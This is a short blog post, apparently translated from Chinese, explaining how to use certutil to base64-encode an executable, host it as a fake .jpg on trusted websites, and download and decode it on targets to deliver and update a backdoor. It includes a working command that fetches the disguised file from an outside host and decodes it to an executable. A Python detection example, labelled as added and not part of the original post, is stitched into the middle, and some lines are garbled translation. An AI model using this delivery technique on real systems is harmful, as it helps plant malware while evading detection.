A novel certutil trick for transporting payloads

It has been a long time since I updated this blog; recently I have gained a lot of insight in the course of practice.

 

Without further ado, on to the main text.

 

First, about certutil: it is used a lot in penetration tests to download files, calculate hashes, do base64 encoding, and so on.

Here is the base64 encoding:

certutil.exe -encode .\MSGboxs.exe  pop.txt

 

With the -encode parameter, the file is base64-encoded and saved to pop.txt.

The generated output looks similar to the following

Again arrange pictures

Then decode it again with certutil

The generated file behaves the same as the original

You can upload the picture to trusted sites such as Microsoft, Baidu, microblogging sites and so on, where it is hard to notice

Then transfer the file through these websites

certutil.exe -urlcache -split -f http://chuantu.xyz/t6/702/1566812284x1031866013.jpg a.jpg && certutil.exe -decode a.jpg msg.exe

It is best to upload to a website that uses a fixed path, such as username.jpg under http://www.xxx.com/user/

That way the image can later be modified directly to change the backdoor on multiple targets.

The generated file is marked at the beginning and at the end with:

-----BEGIN CERTIFICATE-----

-----END CERTIFICATE-----
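From the defender's side, those markers make the transported file easy to recognise. The following is an added example, not code from the original post: a content check that flags certificate armor whose decoded body is a Windows executable rather than DER, and an image extension without JPEG magic. The function names, file names and sample bytes are constructed for illustration.

```python
import base64
import re

# The armor markers shown above, with the base64 body captured between them.
ARMOR = re.compile(
    rb"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----",
    re.DOTALL,
)
JPEG_MAGIC = b"\xff\xd8\xff"


def classify(name: str, data: bytes) -> str:
    """Return a verdict for one downloaded or cached file."""
    match = ARMOR.search(data)
    if match is None:
        return "no-armor"
    try:
        body = base64.b64decode(b"".join(match.group(1).split()), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "armor-invalid-base64"
    if body[:2] == b"MZ":
        verdict = "armored-pe"       # PE executable inside certificate armor
    elif body[:1] == b"\x30":
        verdict = "armored-der"      # DER SEQUENCE: plausibly a real certificate
    else:
        verdict = "armored-unknown"
    # An image extension without image magic is a second, independent signal.
    if name.lower().endswith((".jpg", ".jpeg")) and not data.startswith(JPEG_MAGIC):
        verdict += "+fake-jpeg"
    return verdict


def armor(payload: bytes) -> bytes:
    """Wrap constructed sample bytes in the armor markers, 64 characters per line."""
    b64 = base64.b64encode(payload)
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return (b"-----BEGIN CERTIFICATE-----\r\n" + b"\r\n".join(lines)
            + b"\r\n-----END CERTIFICATE-----\r\n")


# Constructed samples: a disguised executable, a certificate-like blob, a real JPEG header.
SAMPLES = {
    "a.jpg": armor(b"MZ\x90\x00" + bytes(60)),
    "ca.cer": armor(b"\x30\x82\x01\x0a" + bytes(60)),
    "photo.jpg": JPEG_MAGIC + b"\xe0" + bytes(60),
}


def scan(samples: dict) -> dict:
    return {name: classify(name, data) for name, data in samples.items()}
```

The same check can run over proxy-captured downloads or files written by certutil.exe, alongside process-creation alerts for command lines that combine -urlcache with -decode.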

 

It can also be used with a number of web services: read the base64 content directly and decode it to generate the file.

Although it is not very stealthy, it may well serve as an odd little trick for transporting a backdoor.


Origin www.cnblogs.com/wh4am1/p/11414078.html